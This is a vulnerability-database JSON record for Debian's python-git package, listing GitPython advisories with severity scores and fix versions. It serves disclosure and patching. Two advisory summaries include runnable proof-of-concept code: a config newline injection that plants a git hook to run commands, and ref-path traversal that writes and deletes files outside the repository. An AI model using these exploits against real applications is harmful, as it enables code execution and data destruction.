{"url":"http://public2.vulnerablecode.io/api/packages/936509?format=json","purl":"pkg:deb/debian/python-git@3.1.44-1?distro=trixie","type":"deb","namespace":"debian","name":"python-git","version":"3.1.44-1","qualifiers":{"distro":"trixie"},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"3.1.50-1","latest_non_vulnerable_version":"3.1.50-1","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/356967?format=json","vulnerability_id":"VCID-9ktn-1cej-e3fb","summary":"GitPython: Newline injection in config_writer().set_value() enables RCE via core.hooksPath\n`GitConfigParser.set_value()` passes values to Python's `configparser` without validating for newlines. GitPython's own `_write()` converts embedded newlines into indented continuation lines (e.g. `\\n` becomes `\\n\\t`), but Git still accepts an indented `[core]` stanza as a section header — so the injected `core.hooksPath` becomes effective configuration. Any Git operation that invokes hooks (commit, merge, checkout) will then execute scripts from the attacker-controlled path.\n\nThe vulnerability is not merely malformed config output: GitPython's own writer converts embedded newlines into indented continuation lines, but Git still accepts an indented `[core]` stanza as a section header, so the injected `core.hooksPath` becomes effective configuration.\n\nThis was found while auditing MLRun's `project.push()` method, which passes `author_name` and `author_email` directly to `config_writer().set_value()` with no sanitization. Both parameters cross a trust boundary — they are caller-supplied API inputs that end up in `.git/config`.\n\nPoC (standalone, no MLRun required):\n\n```python\nimport git, subprocess, os\n\nrepo = git.Repo(\"/tmp/testrepo\")\n\nwith repo.config_writer() as cw:\n    cw.set_value(\"user\", \"name\", \"foo\\n[core]\\nhooksPath=/tmp/hooks\")\n\nr = subprocess.run([\"git\", \"config\", \"core.hooksPath\"], cwd=\"/tmp/testrepo\", capture_output=True, text=True)\nassert r.returncode == 0\nprint(r.stdout.strip())  # /tmp/hooks\n\nos.makedirs(\"/tmp/hooks\", exist_ok=True)\nopen(\"/tmp/hooks/pre-commit\", \"w\").write(\"#!/bin/sh\\nid > /tmp/pwned\\n\")\nos.chmod(\"/tmp/hooks/pre-commit\", 0o755)\n\nrepo.index.add([\"README\"])\nrepo.git.commit(m=\"test\")\nprint(open(\"/tmp/pwned\").read())  # uid=...\n```\n\nTested on GitPython 3.1.46, git 2.39+.\n\nImpact: This is persistent repo config poisoning. Any user who can supply `author_name` or `author_email` to an application calling `config_writer().set_value()` can redirect Git hook execution to an arbitrary path. In a multi-user or hosted environment (e.g. a shared MLRun server where multiple users push to the same repositories), one user can poison the `.git/config` of a shared repo and have their hooks run in the context of every subsequent Git operation by any user. On single-user deployments, the impact depends on whether the application later invokes Git hooks automatically.\n\nRemediation: `set_value()` should raise on CR, LF, or NUL in values rather than silently pass them through:\n\n```python\nimport re\n\nif isinstance(value, (str, bytes)) and re.search(r\"[\\r\\n\\x00]\", str(value)):\n    raise ValueError(\"Git config values must not contain CR, LF, or NUL\")\n```\n\nRejecting is safer than stripping — a stripped newline might indicate the caller is passing unsanitized input at a higher level, and silent normalization masks that.\n\nAffected wherever `config_writer().set_value(section, key, user_input)` is called with external input.** GitPython is a dependency of DVC, MLflow, Kedro, and others — worth auditing their `set_value()` call sites for externally influenced inputs.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44244","reference_id":"","reference_type":"","scores":[{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05836","published_at":"2026-05-12T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05735","published_at":"2026-05-11T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05724","published_at":"2026-05-09T12:55:00Z"},{"value":"0.00023","scoring_system":"epss","scoring_elements":"0.06552","published_at":"2026-05-14T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44244"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-44244","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-44244"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/gitpython-developers/GitPython","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/gitpython-developers/GitPython"},{"reference_url":"https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-v87r-6q3f-2j67","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-07T20:09:23Z/"}],"url":"https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-v87r-6q3f-2j67"},{"reference_url":"https://github.com/gitpython-developers/GitPython/releases/tag/3.1.49","reference_id":"3.1.49","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-07T20:09:23Z/"}],"url":"https://github.com/gitpython-developers/GitPython/releases/tag/3.1.49"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44244","reference_id":"CVE-2026-44244","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44244"},{"reference_url":"https://github.com/advisories/GHSA-v87r-6q3f-2j67","reference_id":"GHSA-v87r-6q3f-2j67","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v87r-6q3f-2j67"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1103050?format=json","purl":"pkg:deb/debian/python-git@3.1.50-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.50-1%3Fdistro=trixie"}],"aliases":["CVE-2026-44244","GHSA-v87r-6q3f-2j67"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9ktn-1cej-e3fb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354942?format=json","vulnerability_id":"VCID-mntu-memc-x7hp","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42215","reference_id":"","reference_type":"","scores":[{"value":"0.00083","scoring_system":"epss","scoring_elements":"0.23986","published_at":"2026-05-12T12:55:00Z"},{"value":"0.00091","scoring_system":"epss","scoring_elements":"0.25405","published_at":"2026-05-11T12:55:00Z"},{"value":"0.00091","scoring_system":"epss","scoring_elements":"0.25485","published_at":"2026-05-09T12:55:00Z"},{"value":"0.00093","scoring_system":"epss","scoring_elements":"0.25815","published_at":"2026-05-14T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42215"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42215","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42215"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1135349","reference_id":"1135349","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1135349"},{"reference_url":"https://github.com/gitpython-developers/GitPython/releases/tag/3.1.47","reference_id":"3.1.47","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-08T14:39:17Z/"}],"url":"https://github.com/gitpython-developers/GitPython/releases/tag/3.1.47"},{"reference_url":"https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-rpm5-65cw-6hj4","reference_id":"GHSA-rpm5-65cw-6hj4","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-08T14:39:17Z/"}],"url":"https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-rpm5-65cw-6hj4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1103050?format=json","purl":"pkg:deb/debian/python-git@3.1.50-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.50-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42215"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"7.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mntu-memc-x7hp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354943?format=json","vulnerability_id":"VCID-tgne-b83n-6qb4","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42284","reference_id":"","reference_type":"","scores":[{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13494","published_at":"2026-05-11T12:55:00Z"},{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13502","published_at":"2026-05-09T12:55:00Z"},{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13524","published_at":"2026-05-12T12:55:00Z"},{"value":"0.00058","scoring_system":"epss","scoring_elements":"0.18151","published_at":"2026-05-14T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42284"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42284","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42284"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1135350","reference_id":"1135350","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1135350"},{"reference_url":"https://github.com/gitpython-developers/GitPython/releases/tag/3.1.47","reference_id":"3.1.47","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-08T22:50:46Z/"}],"url":"https://github.com/gitpython-developers/GitPython/releases/tag/3.1.47"},{"reference_url":"https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-x2qx-6953-8485","reference_id":"GHSA-x2qx-6953-8485","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-08T22:50:46Z/"}],"url":"https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-x2qx-6953-8485"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1103050?format=json","purl":"pkg:deb/debian/python-git@3.1.50-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.50-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42284"],"risk_score":3.6,"exploitability":"0.5","weighted_severity":"7.3","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tgne-b83n-6qb4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/356944?format=json","vulnerability_id":"VCID-uyvb-m1pr-2kdy","summary":"GitPython reference APIs has a path traversal vulnerability that allows arbitrary file write and delete outside the repository\n## 🧾 Summary\n\nA vulnerability in **GitPython** allows **attackers who can supply a crafted reference path to an application using GitPython** to **write, overwrite, move, or delete files outside the repository’s `.git` directory** via **insufficient validation of reference paths in reference creation, rename, and delete operations**.\n\n---\n\n## 📦 Affected Versions\n\n* Affected: `<= 3.1.46` and current `main` (`3.1.47` in local checkout)\n\n---\n\n## 🧠 Details\n\n### Vulnerability Type\n\n**Path Traversal leading to Arbitrary File Write and Arbitrary File Deletion**\n\n---\n\n### Root Cause\n\nReference paths are validated when they are resolved for reading, but are not consistently validated before filesystem write, rename, and delete operations.\n\n`SymbolicReference._check_ref_name_valid()` rejects traversal sequences such as `..`, but `SymbolicReference.create`, `Reference.create`, `SymbolicReference.set_reference`, `SymbolicReference.rename`, and `SymbolicReference.delete` still construct filesystem paths from attacker-controlled ref names without enforcing repository boundaries.\n\n---\n\n### Affected Code\n\n```python\ndef set_reference(self, ref, logmsg=None):\n    ...\n    fpath = self.abspath\n    assure_directory_exists(fpath, is_file=True)\n\n    lfd = LockedFD(fpath)\n    fd = lfd.open(write=True, stream=True)\n    ...\n```\n\n```python\n@classmethod\ndef delete(cls, repo, path):\n    full_ref_path = cls.to_full_path(path)\n    abs_path = os.path.join(repo.common_dir, full_ref_path)\n    if os.path.exists(abs_path):\n        os.remove(abs_path)\n```\n\n```python\ndef rename(self, new_path, force=False):\n    new_path = self.to_full_path(new_path)\n    new_abs_path = os.path.join(_git_dir(self.repo, new_path), new_path)\n    cur_abs_path = os.path.join(_git_dir(self.repo, self.path), self.path)\n    ...\n    os.rename(cur_abs_path, new_abs_path)\n```\n\n---\n\n### Attack Vector\n\n**Local attack through application-controlled input passed into GitPython reference APIs**\n\n### Authentication Required\n\n**None at the library boundary. In practice, exploitation requires the ability to influence ref names supplied by the consuming application.**\n\n---\n\n## 🧪 Proof of Concept\n\n### Setup\n\n```bash\npip install GitPython==3.1.46\npython poc.py\n```\n\n---\n\n### Exploit\n\n```python\nimport shutil\nfrom pathlib import Path\n\nfrom git import Repo\nfrom git.refs.reference import Reference\nfrom git.refs.symbolic import SymbolicReference\n\nbase = Path(\"gp-ghsa-poc\").resolve()\nif base.exists():\n    shutil.rmtree(base)\n\nrepo_dir = base / \"repo\"\nrepo = Repo.init(repo_dir)\n\n(repo_dir / \"a.txt\").write_text(\"init\\n\", encoding=\"utf-8\")\nrepo.index.add([\"a.txt\"])\nrepo.index.commit(\"init\")\n\noutside_write = base / \"outside_write.txt\"\noutside_delete = base / \"outside_delete.txt\"\noutside_delete.write_text(\"DELETE ME\\n\", encoding=\"utf-8\")\n\nprint(f\"repo_dir       = {repo_dir}\")\nprint(f\"outside_write  = {outside_write}\")\nprint(f\"outside_delete = {outside_delete}\")\n\nReference.create(repo, \"../../../outside_write.txt\", \"HEAD\")\n\nprint(\"\\n[+] outside_write exists:\", outside_write.exists())\nif outside_write.exists():\n    print(\"[+] outside_write content:\")\n    print(outside_write.read_text(encoding=\"utf-8\"))\n\nSymbolicReference.delete(repo, \"../../../outside_delete.txt\")\n\nprint(\"\\n[+] outside_delete exists after delete:\", outside_delete.exists())\n```\n\n---\n\n### Result\n\n```text\nrepo_dir       = ...\\gp-ghsa-poc\\repo\noutside_write  = ...\\gp-ghsa-poc\\outside_write.txt\noutside_delete = ...\\gp-ghsa-poc\\outside_delete.txt\n\n[+] outside_write exists: True\n[+] outside_write content:\n<current HEAD commit SHA>\n\n[+] outside_delete exists after delete: False\n```\n\n---\n\n## 💥 Impact\n\n### What can an attacker do?\n\n* Create or overwrite files outside the repository metadata directory\n* Delete attacker-chosen files reachable from the process permissions\n* Corrupt application state or configuration files\n* Cause denial of service by deleting or overwriting important files\n\n---\n\n### Security Impact\n\n* **Confidentiality:** Low\n* **Integrity:** High\n* **Availability:** High\n\n---\n\n### Who is affected?\n\n* Applications that expose GitPython reference operations to user-controlled input\n* Git automation services, repository management backends, CI/CD helpers, and developer platforms\n* Multi-user environments where one user can influence ref names processed on behalf of another workflow\n\n---\n\n## 🛠️ Mitigation / Fix\n\n### Recommended Fix\n\n```python\ndef _validate_ref_write_path(repo, path, *, for_git_dir=False):\n    SymbolicReference._check_ref_name_valid(path)\n\n    base = Path(repo.git_dir if for_git_dir else repo.common_dir).resolve()\n    target = (base / path).resolve()\n\n    if base not in [target, *target.parents]:\n        raise ValueError(f\"Reference path escapes repository boundary: {path}\")\n\n    return str(target)\n```\n\n```python\nfull_ref_path = cls.to_full_path(path)\n_validate_ref_write_path(repo, full_ref_path)\n```","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44243","reference_id":"","reference_type":"","scores":[{"value":"0.00096","scoring_system":"epss","scoring_elements":"0.26407","published_at":"2026-05-09T12:55:00Z"},{"value":"0.00096","scoring_system":"epss","scoring_elements":"0.26352","published_at":"2026-05-12T12:55:00Z"},{"value":"0.00096","scoring_system":"epss","scoring_elements":"0.26336","published_at":"2026-05-11T12:55:00Z"},{"value":"0.00108","scoring_system":"epss","scoring_elements":"0.2862","published_at":"2026-05-14T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44243"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-44243","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-44243"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/gitpython-developers/GitPython","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"7.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/gitpython-developers/GitPython"},{"reference_url":"https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7545-fcxq-7j24","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-07T19:12:42Z/"}],"url":"https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7545-fcxq-7j24"},{"reference_url":"https://github.com/gitpython-developers/GitPython/releases/tag/3.1.48","reference_id":"3.1.48","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"7.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-07T19:12:42Z/"}],"url":"https://github.com/gitpython-developers/GitPython/releases/tag/3.1.48"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44243","reference_id":"CVE-2026-44243","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"7.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44243"},{"reference_url":"https://github.com/advisories/GHSA-7545-fcxq-7j24","reference_id":"GHSA-7545-fcxq-7j24","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7545-fcxq-7j24"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1103050?format=json","purl":"pkg:deb/debian/python-git@3.1.50-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.50-1%3Fdistro=trixie"}],"aliases":["CVE-2026-44243","GHSA-7545-fcxq-7j24"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uyvb-m1pr-2kdy"}],"fixing_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/10848?format=json","vulnerability_id":"VCID-16je-k2yd-jydf","summary":"GitPython before 3.1.32 does not block insecure non-multi options in clone and clone_from. NOTE: this issue exists because of an incomplete fix for CVE-2022-24439.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-40267.json","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-40267.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-40267","reference_id":"","reference_type":"","scores":[{"value":"0.00351","scoring_system":"epss","scoring_elements":"0.57636","published_at":"2026-05-14T12:55:00Z"},{"value":"0.00351","scoring_system":"epss","scoring_elements":"0.57569","published_at":"2026-05-12T12:55:00Z"},{"value":"0.00351","scoring_system":"epss","scoring_elements":"0.57545","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00351","scoring_system":"epss","scoring_elements":"0.57594","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00351","scoring_system":"epss","scoring_elements":"0.57575","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00351","scoring_system":"epss","scoring_elements":"0.57597","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00351","scoring_system":"epss","scoring_elements":"0.576","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00351","scoring_system":"epss","scoring_elements":"0.57571","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00351","scoring_system":"epss","scoring_elements":"0.57593","published_at":"2026-05-09T12:55:00Z"},{"value":"0.00351","scoring_system":"epss","scoring_elements":"0.57613","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00351","scoring_system":"epss","scoring_elements":"0.57598","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00351","scoring_system":"epss","scoring_elements":"0.57541","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00351","scoring_system":"epss","scoring_elements":"0.57566","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00351","scoring_system":"epss","scoring_elements":"0.57542","published_at":"2026-05-11T12:55:00Z"},{"value":"0.00351","scoring_system":"epss","scoring_elements":"0.57531","published_at":"2026-05-07T12:55:00Z"},{"value":"0.00351","scoring_system":"epss","scoring_elements":"0.57484","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00351","scoring_system":"epss","scoring_elements":"0.57533","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00351","scoring_system":"epss","scoring_elements":"0.57553","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00351","scoring_system":"epss","scoring_elements":"0.57534","published_at":"2026-04-24T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-40267"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40267","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40267"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/gitpython-developers/GitPython","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/gitpython-developers/GitPython"},{"reference_url":"https://github.com/gitpython-developers/GitPython/commit/ca965ecc81853bca7675261729143f54e5bf4cdd","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-10-10T18:18:08Z/"}],"url":"https://github.com/gitpython-developers/GitPython/commit/ca965ecc81853bca7675261729143f54e5bf4cdd"},{"reference_url":"https://github.com/gitpython-developers/GitPython/pull/1609","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-10-10T18:18:08Z/"}],"url":"https://github.com/gitpython-developers/GitPython/pull/1609"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2023-137.yaml","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2023-137.yaml"},{"reference_url":"https://lists.debian.org/debian-lts-announce/2024/10/msg00030.html","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.debian.org/debian-lts-announce/2024/